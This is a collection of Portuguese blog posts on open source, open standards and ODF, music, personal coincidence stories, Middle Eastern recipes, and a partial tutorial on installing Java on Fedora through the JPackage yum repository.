Isso não quer dizer que teremos diversas versões desconexas do mesmo software, num dado momento. Cada modificação passa por um processo muito bem organizado de aceitação ou rejeite, onde boas melhorias retornam à base e são incorporadas à nova versão do software. Na verdade, hoje, a maioria dessas contribuições não é mais feita por indivíduos, mas por empresas de tecnologia.

É comum — e errado — pensar que OSS significa a morte de todo software de código fechado. Isso não acontece porque a tendência é que as grandes inovações continuem a ser exploradas pelo modelo fechado. Imagine um mundo hipotético que ainda não conhece editores de planilhas. É natural que, ao lançar esse produto, seu inventor opte pelo modelo de código fonte fechado, para maximizar seus lucros através do total controle de sua invenção. Contudo, conforme essa invenção se populariza, desenvolve um mercado e adquire concorrentes, OSS surge como uma das formas — a mais inovadora — para repensá-la. OSS inova ao reimplementar o que outros inventaram e exploraram anteriormente. Recentemente, porém, a indústria começou a usar OSS diretamente para lançar certas inovações, justamente pelo seu poder de agregar comunidades e criar ecossistemas.

Também é comum — e errado — acreditar que se o software em si é gratuito, elimina-se por completo os gastos. Mas sempre haverá a necessidade de um suporte confiável. OSS altera o eixo do valor agregado do software, movendo-o do software em si (que não custa nada), para o serviço de suporte.

Open Source, Open Standards relacionados a TI

Em seu processo de amadurecimento, a única diferença prática entre um software OSS e outro de código fonte fechado é a ordem em que as coisas acontecem. Um fabricante comercial terá que criar estrutura e suporte regional antes de vender o produto. Já no OSS, ofertas de suporte só surgem (espontaneamente) depois que ele goza de uma boa gama de usuários. Mas seja qual for a ordem, a única coisa que garante maturidade a qualquer software ou produto é um ciclo de desenvolvimento–uso–suporte, que estimula mais desenvolvimento. Somente essa maturidade garante a aceitação do produto em empresas responsáveis. E hoje, OSSs como Linux, Apache, OpenOffice.org, Samba, e outros já gozam desse ecossistema cíclico de uma forma vasta, global e vigorosa.

Hoje, OSS tem aplicações mais maduras em infraestrutura e alguns nichos de middleware. Por sua vez, os softwares de código fonte fechado apresentam maior desenvoltura mercadológica nas funcionalidades de maior valor agregado ao negócio (ERPs, CRMs ou processos empresariais). Isso porque estas funcionalidades têm uma amplitude menor de usuários, o que inviabiliza o surgimento de suporte espontâneo — fator vital para a maturidade do OSS.

A indústria tem buscado um balanço saudável para misturar componentes fechados com OSS, a fim de maximizar o seu benefício sem abrir mão da maturidade de ponta a ponta. Prova disso é que tem sido cada vez mais comum a implantação de ERPs maduros — geralmente de código fechado — sobre plataformas abertas maduras — como distribuições Linux com suporte.

A receita para o melhor balanço é insistir no uso de Padrões Abertos. Por garantirem uma interoperabilidade fácil entre camadas abertas e de código fechado, o uso de padrões amplia as escolhas e a liberdade da empresa que compra TI para compor a melhor mistura do momento, com opções OSS e/ou de código fechado.

Mais Sons Inspiradores

Como fiz com o Buddha-Bar, agora foi a vez de compactar toda coleção Café del Mar em 2 CDs de MP3 para ouvir no carro.

Café del MarQuer saber? Gosto mais do Café del Mar do que do Buddha-Bar. Enquanto o último se preocupa em sobrevoar sons étnicos de todo o mundo, o Café del Mar é independente, e bem mais zen. É simplesmente delicioso adormecer com a delicadeza etérea desses sons nos ouvidos.

Há muitíssimas coisas ótimas, que remetem a imagens de jardins verdejantes e folhas de palmeiras balançando ao vento, respiração profunda, um êxtase sereno, e sempre a lembrança de que o mundo é maior do que a nossa percepção abafada pelo dia-a-dia é capaz de sentir.

Selecionei (com muita dificuldade) a Northern Lights do Lux, 8:00 AM de Lazybatusu e Adios Ayer de José Padilla, o organizador da coleção. Selecione com o botão direito para baixar e ouvir.

Ah! Tem também algumas rádios de Internet que ainda não estão 100% exploradas, mas vale a dica: Drone Zone, Space Station Soma e Groove Salad, todas no site da Soma.fm.

IBM e OpenDocument Format

A IBM apóia o uso de OpenDocument Format – o padrão aberto para documentos de escritório, e o formato usado pela suite OpenOffice.org, KOffice, Corel WordPerfect Office, e outros.

Estamos num processo interno gradativo de migração para ODF, e falamos da importância disso com governos e clientes, globalmente. Nossos produtos suportam ODF no sentido de consumir e gerar documentos nesse formato.

Uma das vozes mais conhecidas é o blog do Bob Sutor, executivo de padrões da IBM que dá muito foco para ODF. Aqui no Brasil temos o Cezar Taurion, eu e outros fazendo esse papel.

E finalmente vimos o Brasil tomando a liderança na América Latina, recomendando o uso de ODF como formato preferido para documentos do governo.

Semana passada divulgamos o seguinte press release:

Brasil incentiva a utilização do formato OpenDocument

Aliança ODF também é reconhecida por países da Europa e Ásia

São Paulo, 13 de dezembro de 2006 — A OpenDocument Format Alliance (Aliança ODF), que reúne grande número de organizações, instituições acadêmicas e representantes da indústria com o objetivo de melhorar o acesso aos documentos eletrônicos de governo, elogiou a decisão do Brasil de recomendar a ODF como o formato preferido do governo. A Aliança também parabenizou a decisão da Índia de usar a ODF em um grande órgão do governo estadual e a decisão unânime da Itália de reconhecer a ODF como padrão nacional.

A Aliança ODF expressou, ainda, seu apoio à predisposição da China, Coréia e Japão de requerer um “formato de documento internacional e baseado em padrões abertos”, além de reuniões de planejamento de TI e fonte aberta celebradas em forma conjunta anualmente pelos governos dos três países. A Polônia também foi elogiada por demonstrar sério interesse na adoção da ODF após uma reunião nacional celebrada para seu governo com grande número de participantes da indústria e organizações sem fins lucrativos.

Com a publicação da versão 2.0 do e-Ping Interoperability Framework, o Brasil se transforma no primeiro país da América do Sul que recomenda oficialmente a ODF. O quadro estabelece que todos os arquivos .xls, .doc e .ppt se encontram em transição, ou seja, que já não cumprem com suas políticas técnicas, e que a ODF é agora o formato recomendado oficialmente pelo governo do Brasil. O Instituto Nacional de Tecnologia e Informática, o Ministério da Defesa e o Governo do Estado do Paraná, no Brasil, são membros da Aliança ODF.

“2006 acaba de maneira tão auspiciosa como começou, com legiões de governos no mundo inteiro expressando verdadeiro apoio à ODF”, disse Marino Marcich, Diretor Executivo da Aliança ODF. “Parabenizamos o Brasil, a Índia, a Itália, o Japão, a Coréia, a China e a Polônia por reconhecerem a ODF, cada país a seu modo, e estamos ansiosos por ver o impulso contínuo deste movimento no ano que vem.”

Na Índia, o governo ordenou usar arquivos ODF para o escritório de impostos comerciais do governo estadual de Delhi. Além disso, a Itália se une a países como a Malásia, que têm a intenção de reconhecer a ODF como padrão nacional (consultar www.uninfo.polito.it), enquanto o Japão, a Coréia do Sul e a China pensam em usar exclusivamente formatos de documentos internacionais e baseados em padrões abertos como a ODF para reuniões celebradas por seus diretores gerais de Tecnologia e Informática, a fim de debater e promover o software de fonte aberta.

A Aliança tem crescido a mais de 400 membros em mais de 40 países, mostrando um impulso sustentado para o formato de arquivo aberto em nível mundial.

Para obter informações adicionais sobre a ODF Alliance vá para www.odfalliance.org.

Sobre a IBM
Para mais informações sobre a IBM, visite www.ibm.com/br.

Histórias de Muita Coincidência

Entre risadas e caipirinhas de saquê com lichia com amigos no Mestiço, começamos a contar experiências pessoais com coincidências impressionantes.

Algumas delas faria qualquer pessoa simplesmente desacreditar se não tivesse acontecido consigo mesmo. Selecionei algumas para compartilhar:

Estive em Paris este ano e ía para o aeroporto Charles de Gaulle de metrô — aquele tipo de transporte que tem dezenas de vagões num mesmo trêm, e por onde circulam dezenas de milhares de pessoas por dia.

Numa certa estação quem é que entra no meu vagão, bem na minha frente? A única pessoa que conhecia — mesmo que remotamente — morando em Paris: a Denise, colega de trabalho que tinha se mudado para lá.

Eram os últimos respiros da Varig e seus vôos estavam sendo cancelados. Ela também estava indo para lá, levar a filha para tentar tomar o mesmíssimo vôo. Só que no caso delas já era a segunda tentativa de tomá-lo.

Coincidência ou não, ela nos ajudou naquele enorme aeroporto e deu as dicas de com quem falar e qual ônibus tomar para ir ao terminal correto. Talvez sem a ajuda dela teríamos tido problemas.


A Adriana tem alguns irmãos. Certo dia ela estava parada num farol da Av. Rebouças e viu seu irmão Julio parado no mesmo farol, do outro lado da avenida.

A Rebouças é uma das principais avenidas da cidade, com tráfego de algumas dezenas de milhares de carros por dia.

Mas até ai tudo bem. O mais incrível é que naquele mesmo farol fechado, com a Adriana e o Julio parados naquele instante, a Bia — outra irmã — atravessava a avenida.

Qual é a probabilidade de dois irmãos se encontrarem numa avenida como essa? Qual é a probabilidade de três irmãos estarem ao mesmo tempo no mesmo lugar, numa cidade tão grande, e sem terem marcado ?

A noite, em casa, os três confirmaram que se viram naquele cruzamento.


Saí umas 22:00 do trabalho certa vez, e tomei um taxi para ir para casa. Ele passou pela Av. Paulista, que normalmente nesse horário tem muito trânsito.

Qual é a probabilidade de alguém bater o carro na Av. Paulista? Quantos acidentes acontecem alí por dia? Com certeza alguns.

Bem, o taxista foi fazer uma manobra e bateu de leve no carro da frente. Quem saiu cheteada do carro batido para reclamar? A Daniele, uma grande amiga minha. Qual é a probabilidade de um taxi em que você está bater no carro de um conhecido? E no de uma grande amiga então ?

Sua tristeza era maior do que a batida. Tinha perdido o emprego naquele dia, o carro era novo, tirado da loja dois dias antes, e sentia-se sozinha com tanta desgraça acontecendo enquanto esperava o namorado voltar da pós-graduação para consolá-la. Então ajudei ela e o pobre taxista a negociar a funilaria, dispensei o motorista, e ofereci o ombro amigo e companhia, até o namorado voltar. (Hoje ela está bem, empregada, curte boa vida e já trocou de carro várias vezes).


Uma amiga contou que uma conhecida casada viajou para a Europa, conheceu por acaso um homem alí e começou a ter um caso com ele. E voltou para o Brasil e para sua vida normal. Tempos depois o marido no Brasil viajaria para o mesmo país e iria se encontrar com o único amigo que ele tem lá: concidentemente o mesmo homem com quem ela teve um caso.


Fui a uma cafeteria tarde da noite com uma amiga que tem uma mediunidade muito forte, do tipo “I see dead people all the time”.

O lugar estava completamente vazio, e ao sentarmos ela disse que havia um espírito brincando de se esconder e aparecer bem atrás de uma coluna. Naquele momento eu só pensei que o espírito podia ser meu primo Rami. Não sei porque me ocorreu aquilo, visto que ele havia morrido uns 20 anos antes, e era um parente que não visitava com freqüência as minhas lembranças.

Mas não falei nada sobre meu pensamento. Só brinquei com ela pedindo que chamasse o tal espírito para vir conversar conosco, através dela, claro. Eu não tenho o menor problema com essas coisas e acredito muito, desde que seja de fontes que me inspirem confiança.

Ela se recusou, e recomendou deixarmos ele em paz. OK.

Minutos depois ela foi ao banheiro. Quando voltou, sentou, deu um tapinha na mesa e disse: “Seguinte, o nome desse espírito é Rami.”

Meu queixo caiu porque não tinha falado nada para ela (ou seja, não foi induzido) e nós “três” passamos o resto da noite conversando sobre música (Rami era um ótimo músico) e sobre nossa família.

Não é exatamente uma história de coincidência. Mas, telepatia ou mediunidade, é algo bem além da imaginação, e foi sensacional.


Talvez há um propósito para essas coisas acontecerem. Ou talvez não. Mas uma coisa é certa: acontecimentos desse tipo nos fazem pelo menos parar para repensar o mundo. E sim, é ainda uma zona cinzenta e nebulosa para a ciência . . .Leitor, você tem histórias assim para compartilhar ?

Museu Afro-Brasil no Ibirapuera

O Parque Ibirapuera me recebeu de braços abertos ontem para uma rodada de bicicleta. É uma pérola de nossa cidade com aquelas árvores enormes e magestosas e pessoas bonitas praticando esportes.

Dei de frente com o Museu Afro Brasil lá dentro e aproveitei para conferir. É uma exposição permanente, densa e vasta, e muita bonita, com arte e cultura de todo o Brasil. De xilogravuras armoriais típicas do nordeste, ao grafite das grandes cidades do sul. De letras e poesias gravadas nas paredes, a panfletos do encontro nacional das trabalhadoras do sexo de Salvador. De arte e fotografia da cultura do Candomblé, a um horrendo esqueleto de navio negreiro. Este último ficava numa sala a parte, junto de mais fotografias e dizeres de FHC, Castro Alves e outros. Foi muito tocante.

Fiquei impressionado com as enormes fotografias de nativos africanos, suas vestimentas (ou ausência de) e rituais, de uma tal de Isabel Muñoz.

Enquanto andava pela exposição fiquei ouvindo Ulisses Rocha e seu violão solar, que caiu como uma luva para o momento. Sempre cai.

Não deixe de visitar.

Wireless iPod

AirPlay2Tentando me desfazer dos anti-sociais-fones-de-ouvido, fui na onda de comprar um transmissor FM para o iPod que ganhei de aniversário.

Para quem não sabe o que é isso, trata-se de um dispositivo que se pluga ao iPod e que transmite o que ele toca para um rádio, por ondas de FM.

Minha dica é: não perca seu tempo com isso. Testei vários e todos são ruins. Sim, você consegue ouvir no rádio o que o iPod toca, mas sempremuito chiado, e só funciona a poucos centímetros do rádio, o que não é prático.

Irritei-me e devolvi hoje para a loja.

Aquecimento Global

SAIBAM, que a Terra não será mais a mesma dentro de 20 ou 30 anos.


Aumento da variação de temperaturaA Natureza não consegue rearranjar seus ecossistemas tão rápido quanto o homem tem feito a temperatura do planeta subir, através da crescente emissão de CO2 (dióxido de carbono), marca de nossa era industrial. Então, antes da maioria de nós deixar esta vida, veremos secas fustigantes, enchentes avassaladoras e extinções irreversíveis. Já começou. Espécies, geleiras e continentes inteiros sumirão do mapa.

O mais terrível não é a mudança na paisagem global, mas os impactos sócio-econômicos. Imaginem as hordas de milhões de pessoas — 6 casas decimais de desabrigados — migrando para as montanhas porque seus paises e cidades viraram parte dos oceanos Índico, Pacífico e Atlântico. Ou teremos séculos de guerras por água e m2, ou aprenderemos a viver em paz e compartilhar os recursos.

Este assunto era um rumor remoto para mim, mas é impossível não se sensibilizar com o documentário Uma Verdade Inconveniente, ainda em exibição em algumas salas de São Paulo. Os fatos relatados alí não me saem da cabeça, e é filme obrigatório para todas as pessoas.

Faça Sua Parte Para Evitar o Aquecimento Global

Mais na Web

Lembre-se: o planeta não é nosso; ele nos foi emprestado pelos nossos filhos (provérbio africano).

Receita de Kiopolo

BeringelasIsto é uma engenharia reversa bem sucedida de uma entrada típica da culinária judaica-sefaradita ou búlgara. Pode ser encontrada em São Paulo no Shoshi Delishop, no Bom Retiro (R. Correia de Melo quase esquina com a Três Rios).

Ingredientes

  • Beringelas: 4
  • Pimentão vermelho: 1
  • Alho amassado: um pouco menos de 1/2 cabeça
  • Azeite extra virgem
  • Suco de limão: 1 se for fraco, 1/2 se for forte
  • Sementes de kümmel, opcional
  • Adoçante ou açucar a gosto
  • Sal a gosto

Modo de Preparo

  1. Coloque as beringelas e o pimentão diretamente sobre o fogo das bocas do fogão sem nenhuma proteção. Isso vai dar um sabor especial ao prato.
  2. Vire de vez em quando com um pegador longo de metal, pegando a beringela sempre pelas extremidades. Toda a pele deve ficar queimada e carbonizada, praticamente se descolando da polpa, e o fruto deve se abrir em alguns pontos revelando estar mole e molhado.
  3. Espere esfriar até uma temperatura que não queime as mãos.
  4. Segure a beringela pelo cabo e remova gentilmente a pele queimada, e por último o cabo.
  5. Faça a mesma coisa com o pimentão, removendo a pele e sementes. Mais detalhes na receita de matbukha.
  6. Coloque a beringela longitudinalmente numa tábua, uma de cada vez, e com uma faca grande massere-a na transversal quebrando suas fibras. Depois pique mais até o ponto de ficar uma massa. E vá juntando todas elas num recipiente final.
  7. Pique o pimentão em pedaços bem pequenos e finos e junte no recipiente final. Ele serve mais para dar um tom vermelho esporádico à salada.
  8. Junto o alho amassado.
  9. Regue com azeite extra virgem. Regue com o limão ou vinagre. Por incrível que pareça, o azedo do vinagre desaparece e ele potencializa o sabor assado da beringela.
  10. Adicione um pouco de kümmel. Atenção para ele não dominar a salada. Ele deve funcionar como uma surpresa em algumas poucas mordidas.
  11. Misture tudo e vá experimentando, regulando o sal, vinagre e adoçante/açucar. É importante ter um sabor levemente adocicado.

Sirva frio, com pão sírio ou outro tipo de pão, como entrada ou petisco.

Kiopolo é delicioso e quem experimenta quer a receita. Eu sempre preparo esta receita quando faço matbukha, porque o trabalho é o mesmo.

outras versões desta receita na Internet.

Padrões Abertos e Linux no Desktop

Hoje a indústria usa o sistema operacional de desktop de praticamente um único fornecedor, cria aplicações gráficas 100% dependentes dele, e usa uma suite de escritório que também só funciona sobre esse mesmo sistema operacional. Ainda por cima, os documentos de formato proprietário com que o mercado usa só podem ser gerados e consumidos por essa mesma suite.

Se nossos CDs de música tocam em qualquer CD player, por que nossas aplicações, páginas da web, documentos, etc não podem ser usados em qualquer sistema operacional, plataforma de hardware, etc ?

A demora para isso acontecer reflete quão dependente dessas tecnologias proprietárias é o mercado. Isso é caro principalmente porque não há com quem negociar alternativas, e por isso essas tecnologias terão o preço que seu fornecedor quiser.

A IBM ainda está analisando o direcionamento futuro dos nossos desktops internos para funcionários. Não foi decidido entre Linux ou Vista, nem Darwin, nem BSD, nem nenhum outro sistema operacional.

Temos iniciativas internas fortíssimas para que os produtos e serviços de nossa Intranet sigam Padrões Abertos. Dessa forma, um funcionário pode escolher o sistema operacional que melhor se adequar ao seu trabalho.

Não usamos uma tecnologia proprietária de impressão remota, e sim o serviço que usa Padrões Abertos para imprimir na rede.

Não usamos uma aplicação proprietária de VPN, mas o serviço de VPN que usa Padrões Abertos.

Não temos um serviço de diretórios de uma implementação proprietária, e sim um diretório corporativo baseado no Padrão Aberto LDAP.

Não usamos documentos de formatos proprietários, que só podem ser gerados e consumidos por uma única suite de escritório, mas reforçamos o uso do novo Open Document Format, baseado em XML, introduzido pelo OpenOffice.org, que pode ser aberto em qualquer suite de escritório.

E por aí vai….

A última fronteira é a convergência gradativa dos produtos de workgroup baseados em Lotus Notes com o novo Workplace Client Technology, que implementa Padrões Abertos, e que é baseado no Eclipse (como dezenas de outros produtos da IBM).

E digo mais: as tecnologias proprietárias que usamos internamente nos nossos desktops, tivemos que adotá-las porque quando surgiu a necessidade de resolver o problema de negócio que elas resolvem, simplesmente não haviam opções que implementassem Padrões Abertos. Conforme surgem Padrões para aquele determinado problema, isso entra em pauta e a migração é estudada seriamente. Logicamente analizando custos, funcionalidades, viabilidade, etc, porque essa é a forma racional de se fazer mudanças.

Padrões Abertos. Padrões Abertos. Padrões Abertos. Essas são as palavras do momento.

Para o mundo comercial, isso é mais importante do que ter acesso ao código fonte de um software. E é algo que deve estar sempre presente na pauta de TI do CIO.

Pregamos que companhias que inovam reutilizando Padrões Abertos levam vantagem porque seus recursos são liberados para trabalhos que agregam maior valor, e porque as oportunidades do mercado se expandem à medida que os Padrões Abertos proliferam.

É o que dizemos aos nossos clientes. É o que acreditamos. E é o que fazemos.

Receita de Matbukha

PimentõesProvei matbukha (ou matbucha ou matbuha) pela primeira vez em um restaurante libanês em Abu-Gosh, uma vila árabe perto de Jerusalém.

Fiquei impressionado, e depois comprei nos supermercados de Israel matbukha pronta várias vezes. Bem, aqui não há essas coisas para vender, então achei a receita na Internet, que minha mãe traduziu para mim. Fiz e ficou muito bom.

Ingredientes

  • 2 latas de tomates pelados
  • 4 pimentões vermelhos
  • 1 pimentão verde (para variar a cor)
  • 1/2 cabeça de alho amassado
  • 1 colher de sopa de páprica doce
  • Pimenta ardida a gosto
  • 1/2 xícara de café de azeite de oliva virgem
  • Sal e açucar ou adoçante a gosto

Modo de Preparo

  1. Coloque os pimentões diretamente sobre o fogo das bocas do fogão sem nenhuma proteção e vire de vez em quando até toda a pele ficar preta e carbonizada. O fogão vai ficar sujo, mas é essa assagem que vai dar um sabor especial ao prato.
  2. Deixe-os esfriar até uma temperatura que não queime as mãos.
  3. Limpe os pimentões removendo facilmente a pele carbonizada. Muitas pessoas evitam pimentões porque os consideram de dificil digestão. Bem, é esta pele carbonizada, de pura celulose indigesta, a vilã da estória. Depois de remove-la, o pimentão é só delícia.
  4. Abra-os e remova cirurgicamente o miolo com as sementes.
  5. Lave-os cuidadosamente removendo o resto de pele e semente que ficaram grudados.
  6. O resultado parece um bife fino e grande, que deve ser cortado em pedaços quadrados de 1 ou 2cm2.
  7. Triture muito pouco os tomates pelados. Devem sobrar pedaços relativamente grandes.
  8. Junte os tomates, pimentões, alho amassado e pimenta ardida numa panela.
  9. Ferva em fogo baixo por uns 20 minutos, mexendo sempre.
  10. Pitada de açucar ou adoçante (isso é muito importante) e sal.
  11. Misture a páprica ao azeite numa xícara e junte à panela.
  12. Cozinhe devagar, com panela destampada e fogo baixo até a água evaporar e engrossar.
  13. Esfrie e espere algumas horas antes de servir, para o sabor apurar.

Matbukha se come fria, como entrada com pão sírio ou outro pão, e é deliciosa.

A Mais Importante Notícia do Ano

Open Source JavaA Sun abriu o código fonte de sua implementação do Java.

Teria muitas coisas positivas para falar sobre isso, mas o Kov já disse boa parte, e o Simon Phipps também.

Faltava no mundo Open Source uma linguagem/tecnologia de desenvolvimento universal, madura, altamente padronizada com portabilidade em mente, e com ecossistema vigoroso em toda a indústria. Java tem todos estes atributos.

Essa carência, somado ao fato de Java não ser instalado automaticamente quando se instalava qualquer Linux (por questões de lincenciamento), fervilhava o idealismo da comunidade Open Source fazendo os programadores lançarem mão de outras linguagens/tecnologias que ou tem portabilidade questionável (como C, C++, por causa de suas bibliotecas), ou que ainda não se estabeleceram com maturidade, performance e ecossistema industrial (como PHP, Perl, Python, Ruby), ou ambos (como C#, Mono). O resultado na indústria é uma descentralização de skill de desenvolvimento de software de negócio.

Java entrando no cenário Open Source muda tudo isso. Será benéfico para o ecossistema de Computação Aberta, e principalmente para o de Linux como plataforma de negócio.

Minha previsão agora, é que as JVMs da IBM, Bea etc serão também abertas em breve para logo depois se fundir numa JVM/JDK única de alta performance, portável, modular, facilmente instalável, e de bem estabelecido ecossistema.

É a maior notícia do ano para TI. Talvez da década.

Instalando Java e Eclipse em Linux

permalink Porque Java com Linux ?

Nos primórdios das tecnologias, todas elas nasciam proprietárias porque seus criadores queriam explora-las ao máximo, por serem todas novidades.

Depois da popularização do PC, e mais ainda, da Internet, fabricantes começaram a se reunir ao redor de Padrões Abertos para criar uma rede de valor onde todos — fabricantes e usuários — acabam ganhando.

Os Pilares do e-businessExistem hoje inúmeros Padrões Abertos, mas os que se destacam são os seguintes:

  • HTML
    É a representação universal de interfaces com usuários. Hoje qualquer usuário de computador sabe usar um browser e navegar através de um hipertexto. HTML, ou melhor ainda, hoje, DHTML ou AJAX, é o padrão aberto para aplicações interagirem com usuários.
  • XML
    Antes de XML, não havia um padrão aberto amplamente aceito que permitisse qualquer aplicação falar com qualquer outra aplicação, mesmo de fabricantes diferentes. XML se tornou a base dos Web Services e Arquitetura Orientada a Serviços, que traz o benefício da integração de processos, com parceiros, clientes e fornecedores.
  • Java Enterprise Edition
    Java é a tecnologia escolhida por toda a indústria para transformar processos de negócio em software. É o Padrão Aberto para se escrever aplicações. Antes de Java, desenvolvedores usam diversas linguagens, sem uma metodologia universal de programação e sem nenhum padrão de bibliotecas de alto nível. JEE (Java Enterprise Edition) é um padrão de biblioteca com métodos universais para aplicações de negócio.
  • Linux
    É o sistema operacional escalável e multiplataforma para rodar tudo isso. É o componente aberto que faltava para ligar a lógica de negócio com padrões abertos de HW.

Essas quatro tecnologias juntas provém tudo que um desenvolvedor precisa para criar suas aplicações de negócio.

permalink Java comparado a C/C++, PHP, Perl e Python

Cabe ao desenvolvedor escolher a linguagem/tecnologia certa para a aplicação certa. Não só os aspectos tecnológicos devem ser levados em conta, mas também aceitação no mercado, aderência a padrões, reputação, política de atualização da tecnológica, prontidão para uma aplicação de negócios, etc.

  • C é uma linguagem criada para desenvolver sistemas operacionais, ou algoritmos de baixo nível, quase no nível da máquina, e é nesse nível que essa linguagem se sai melhor. C++ surgiu a alguns anos trazendo orientação a objetos, mas ambas linguagens falharam em padronizar suas semânticas e, principalmente, bibliotecas multiplataforma abertas, e de uso genérico. A não ser que você esteja escrevendo sistemas operacionais, ou bibliotecas de acesso a hardware, uma linguagem mais prática que C ou C++ deve ser escolhida para desenvolver sua aplicação de negócio.
  • PHP é uma linguagem/tecnologia desenhada para criar páginas web dinâmicas. Seus programas são geralmente mesclados com código HTML e equivale a JSP e ASP. É muito usada e provou seu valor, porém tem pouca penetração no mundo corporativo e de aplicações de negócio (de fabricantes de SW), e por isso pouco suporte da indústria para que a tecnologia evolua como um padrão. Então, por ser um investimento de risco, dificilmente uma grande empresa vai escolher PHP como tecnologia estratégica para a confecção de suas aplicações críticas, mesmo porque PHP é mais madura somente para aplicações web.
  • Perl é abreviação de Practical Extract and Reporting Language, que sugere ter sido criada para manipular texto. A linguagem e suas bibliotecas cresceram para muito além disso, e há hoje quem a use para fazer grandes sistemas. Porém isso é considerado um exagero de uso, pois os programas são interpretados em tempo de execução, o que acarreta performance limitada, e é de fato desenhada para automatizar tarefas de sistema operacional. Python, apesar de ser mais moderna e poder ser compilada, não foge muito deste escopo também. Além disso, ambas ainda não conseguiram uma aceitação comercial madura, e, não representando um investimento seguro a longo prazo, ainda não tem sido escolhidas como estratégicas para a fábrica de SW de uma empresa, ou para um sistema complexo e de missão crítica.

Em contrapartida, a tecnologia Java tem as seguintes características:

  • Atingiu um nível de maturidade e aceitação de toda a industrial que o torna um investimento seguro quando da escolha de uma plataforma de desenvolvimento de aplicações de negócio.
  • Evolui de acordo com as decisões de um comitê independente chamado Java Community Process, onde empresas e indivíduos votam igualmente para a aceitação de uma novidade. São integrantes ativos do JCP empresas como IBM, Apache Software Foundation, Dolby Laboratories, JBoss, SAP, Oracle, Nokia, Sony, etc. Lista completa em http://jcp.org/en/participation/members.
  • Toda a indústria respeita as decisões do JCP, evitando o surgimento de derivados (forks) de comportamento diferente.
  • É um grande polo tecnológico, tendo somente .NET como seu polo oposto e concorrente (e ainda imaturo de certa forma).

permalink Instalando Java Em Linux

Há muitas formas de instalar a JVM em Linux, mas há somente uma forma correta: usando RPM através do repositório JPackage.

permalink Sobre Repositórios de RPMs

A instalação de um pacote RPM pode falhar se outro pacote precisa ser instalado antes. Isso é conhecido como o inferno das dependências.

Para resolver este problema a comunidade criou ferramentas de instalação de pacotes como o Yum e o APT, que, junto com os metadados oferecidos por um repositório de RPMs, liquidam este problema calculando tudo que é necessário fazer para instalar certo pacote, atualizando automaticamente pacotes já instalados, ou instalando novos, tudo para satisfazer as dependências do pacote que o usuário deseja instalar.

Um repositório é um site na web que contem vários RPMs e metadados de interdependências sobre esses pacotes, que são usados por ferramentas como yum e apt-get.


permalink
O projeto JPackage e seu Repositório de RPMs

jpackage logoO JPackage é um repositório de RPMs de alta qualidade de softwares relacionados a Java. É uma comunidade de pessoas que empacotam em RPM as JVMs mais conhecidas do mercado, bem como softwares Java populares como Tomcat, Eclipse, Jakarta, etc.

A primeira pergunta que surge depois que dizemos isso é: “Mas as JVMs da Sun, IBM, etc já não são disponibilizadas em RPM ?�? Sim, mas cada fornecedor empacota como bem entende, sem seguir nenhum padrão de diretórios ou do sistema operacional. E essa despadronização faz a tecnologia como um todo ser mais difícil de usar.

O Projeto JPackage resolveu isso definindo uma organização de diretórios que permite multiplas JVMs, e lugares padronizados para arquivos JAR, WAR, EAR, etc. O JPackage inovou simplesmente aplicando os conceitos do Filesystem Hierarchy Standard — um padrão aberto dos mais importantes para Linux — aos softwares Java.

O resultado é tão bom, que a Red Hat, SUSE, Mandriva e outros adotaram o padrão JPackage de empacotamento e diretórios para tudo que se refere a Java em suas distribuições (RHEL, Fedora, SLES, SLED, OpenSUSE, NLD, Mandriva, etc).

permalink Problemas do JPackage

O JPackage tem uma diretriz de fornecer em seu repositório somente RPMs de softwares livres. Por isso, softwares que não tem licenças livres estão lá somente como RPMs-fonte, que não são tão simples de se instalar, mas mesmo assim promovem a organização e a qualidade do JPackage. Entre esses softwares estão a própria JVM, que vamos demonstrar sua instalação agora.

permalink Inicializando o JPackage em seu sistema

Antes de instalar qualquer RPM oferecido pelo JPackage, você precisa configurar as ferramentas que acessam e instalam os pacotes automaticamente no seu sistema.

Nos nossos exemplos, vamos usar o Fedora Linux com YUM. Pode-se optar pelo apt-get ao invés do YUM, ou de outra distribuição Linux ao invés do Fedora. No caso do Red Hat Enterprise Linux ou CentOS, o processo é idêntico.

permalink Tenha o YUM ou apt-get no seu sistema

No caso do Fedora 4, RHEL 4 ou CentOS 4, já temos o YUM instalado no sistema, e só teremos que configura-lo.

No caso de outro Linux, você pode testar se estas ferramentas estão instaladas simplesmente executando o comando yum ou apt-get.

Se você finalmente concluiu que não as tem, encontre-as aqui:

Nos nossos exemplos, vamos usar o Yum.

permalink Configure o YUM para usar o repositório JPackage

Basta instalar um arquivo de configuração no diretório /etc/yum.repos.d/ desta maneira:

bash# cd /etc/yum.repos.d/
bash# wget http://www.jpackage.org/jpackage.repo

Edite o arquivo jpacakge.repo que você acabou de baixar habilitando e desabilitando os canais de RPMs específicos para seu sistema. Por exemplo, no nosso Fedora Core, garantimos que os canais jpackage-generic e jpackage-fc contém a linha “enabled=1�?.

permalink Instale o primeiro pacote

O pacote jpackage-utils deve estar instalado para começar usar o repositório. Nas últimas versões das distribuições populares, ele já está instalado. Nesse caso é boa idéia atualiza-lo.

Para fazer isso:

bash# yum install jpackage-utils   # No caso de não estar instalado ainda.
bash# yum update jpackage-utils    # Para atualiza-lo.

permalink Instalando a Máquina Virtual Java (JVM)

Esta é uma das partes mais difíceis porque por questões de licensa o Projeto JPackage não tem permissão para prover o RPM pronto para ser instalado de softwares que tem licensa restrita. É o caso de todas as JVMs comerciais. O JPackage provê o pacote fonte que a partir dele pode-se construir fácil, porém manualmente, o RPM instalável. E vamos demonstrar isso aqui.

permalink JVM da IBM

Seguimos estes passos:

  1. http://www.jpackage.org
  2. Procuramos e baixamos o nosrc.rpm da JVM da IBM. A última vez que olhamos estava em http://mirrors.dotsr…./java-1.5.0-ibm-1.5.0.2.3-3jpp.nosrc.rpm
  3. Consultamos o pacote para descobrir de onde se baixa a JVM da IBM com o comando rpm:
    bash# rpm -qpi java*nosrc.rpm
    Name        : java-1.5.0-ibm               Relocations: (not relocatable)
    Version     : 1.5.0.2.3                         Vendor: JPackage Project
    Release     : 3jpp                          Build Date: Tue 15 Aug 2006
    Install Date: (not installed)               Build Host: tortoise.toronto.redhat.com
    Group       : Development/Interpreters      Source RPM: (none)
    Size        : 395165271                        License: IBM Binary Code License
    Signature   : (none)
    Packager    : Thomas Fitzsimmons
    URL         : http://ibm.com/developerworks/java/jdk/linux/download.html
    Summary     : IBM Java Runtime Environment
    Description :
    This package contains the IBM Java Runtime Environment.

    e descobrimos que devemos procurar na URL marcada.

